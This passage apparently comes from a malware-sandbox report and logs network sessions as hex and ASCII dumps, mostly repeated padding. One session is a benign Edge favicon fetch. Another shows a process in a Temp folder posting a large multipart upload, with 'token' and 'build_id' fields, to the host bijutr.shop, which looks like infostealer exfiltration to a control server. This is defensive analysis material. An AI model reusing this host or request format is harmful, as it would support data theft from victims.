                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:38 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      30192.168.2.74987723.209.72.214432340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:38 UTC751OUTGET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: assets.msn.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:38 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                      ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                                      Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:38 GMT
                                                                                                                                                                                                                                                                                      Content-Length: 354
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      Akamai-Request-BC: [a=23.210.4.135,b=1958601252,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                      Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                      Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                      Akamai-Server-IP: 23.210.4.135
                                                                                                                                                                                                                                                                                      Akamai-Request-ID: 74bde224
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Akamai-GRN: 0.8704d217.1735279838.74bde224
                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:38 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      31192.168.2.749894188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----3OH479ZMGLN7QIMYUKFU
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 131557
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 33 4f 48 34 37 39 5a 4d 47 4c 4e 37 51 49 4d 59 55 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 48 34 37 39 5a 4d 47 4c 4e 37 51 49 4d 59 55 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 33 4f 48 34 37 39 5a 4d 47 4c 4e 37 51 49 4d 59 55 4b 46 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------3OH479ZMGLN7QIMYUKFUContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------3OH479ZMGLN7QIMYUKFUContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------3OH479ZMGLN7QIMYUKFUCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:39 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
